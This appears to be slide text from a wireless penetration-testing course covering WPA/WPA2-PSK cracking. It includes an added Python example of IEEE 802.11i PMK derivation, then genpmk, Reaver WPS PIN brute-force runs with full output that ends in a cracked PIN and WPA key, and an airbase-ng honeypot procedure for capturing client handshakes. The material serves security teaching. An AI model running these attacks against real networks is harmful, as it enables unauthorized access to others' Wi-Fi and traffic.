WPA-WPA2
Wireless Pentest
WPA & WPA2
Wireless Protected Access
A bit more theory…
WPA - Pre-Shared Key
WPA Attack
Decrypting WPA-PSK
WPA2 - PSK
• Uses the same principles as WPA
• The weakness lies in the chosen passphrase
• Nothing more to be said!!!!!
• Same procedure as before
Speeding up the cracking process
• We can pre-compute the PMK for a given SSID and a wordlist using the genpmk tool
• genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab"
• Let's create a WPA-PSK network with the password skysign and capture this network's WPA handshake
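Why a genpmk table only works for the SSID it was built for, shown as an added example written for this page (not code from the slides or from genpmk/coWPAtty): the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), so the SSID acts as a salt, and a non-default SSID plus a long passphrase is the defender's answer to precomputed tables. The wordlist below is constructed, the known-answer vector is the one from IEEE 802.11i-2004 Annex H.4.1, and since the standard requires 8 to 63 characters, a 7-character passphrase such as the slide's "skysign" would be rejected by a standards-conforming supplicant or AP.

```python
import hashlib

# Added example, not from the slides: PMK derivation as specified by IEEE 802.11i.
# WPA/WPA2-Personal maps the passphrase to a 256-bit PMK with PBKDF2-HMAC-SHA1,
# using the SSID as the salt and 4096 iterations. This is exactly what genpmk
# precomputes, which is why its tables are bound to a single SSID.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32  # bytes

# Known-answer vector from IEEE 802.11i-2004 Annex H.4.1.
IEEE_VECTOR = (
    "password", "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Return the PMK (the PSK) for a WPA/WPA2-Personal network."""
    if not 8 <= len(passphrase) <= 63:
        # The standard requires 8..63 ASCII characters.
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LEN,
    )


def check_known_vector() -> bool:
    """Self-check of the derivation against the IEEE test vector."""
    passphrase, ssid, expected_hex = IEEE_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


def precompute_pmk_table(ssid: str, wordlist: list) -> dict:
    """Build a passphrase -> PMK-hex table for one SSID (what genpmk stores)."""
    return {word: derive_pmk(word, ssid).hex() for word in wordlist}


def table_reusable(table: dict, other_ssid: str) -> bool:
    """True if any precomputed PMK is still valid when the SSID is other_ssid."""
    return any(derive_pmk(w, other_ssid).hex() == pmk for w, pmk in table.items())


if __name__ == "__main__":
    # Constructed wordlist for the demo (not a real list).
    words = ["password", "letmein123", "wirelesslab"]
    table = precompute_pmk_table("Wireless Lab", words)
    print("IEEE vector OK:", check_known_vector())
    print("table reusable for 'Wireless Lab 2'?", table_reusable(table, "Wireless Lab 2"))
```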
Measure the time taken with aircrack and compare…
Using the PMK with aircrack
Pyrit for multi-CPU systems
How does Reaver work?
• Exploits the vulnerability in WPS – Wi-Fi Protected Setup
• Brute-forces PINs to reveal the WPA or WPA2 passwords
• Takes 4 to 10 hours
• Does not work on all APs
Cracking via Reaver
1) airmon-ng start wlan0
2) airodump-ng mon0
In the other terminal:
3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Switching mon0 to channel 11
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
Cracking via Reaver
root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] Trying pin 33335674
[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)
[+] Trying pin 44445676
[+] Trying pin 55555678
[+] Trying pin 66665670
[+] Trying pin 77775672
[+] Trying pin 88885674
[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)
[+] Trying pin 99995676
[+] Trying pin 00015677
[+] Trying pin 00025676
[+] Trying pin 00035675
Cracking via Reaver
root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 22838353
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '22838353'
[+] WPA PSK: 'DECADA1234'
[+] AP SSID: 'multipinguim-2'
[+] Nothing done, nothing to save.
Connecting to a WPA network
wpa-supp.conf
Cracking AP-less WPA Personal
• To crack WPA we need the 4-way handshake:
– Authenticator Nonce, Supplicant Nonce, Authenticator MAC, Supplicant MAC.
– But for this attack we do not need all of these packets:
• Either packets 1 & 2 or packets 2 & 3
• To crack it we therefore need a WPA-PSK honeypot for the client to connect to; we only need msg 1 and msg 2.
• We do not need to know any passphrase ;-)
1) Set up our honeypot: airbase-ng -c 3 -a <AP> -e "Wireless Lab" -W 1 -z 2 mon0
2) Start airodump: airodump-ng -c 3 --bssid <AP> --write sem-AP-WPA-cracking mon0
3) Go back to the airbase screen and watch the clients associating
4) Go back to the airodump screen and check whether it captured the WPA handshake
5) Now run aircrack: aircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap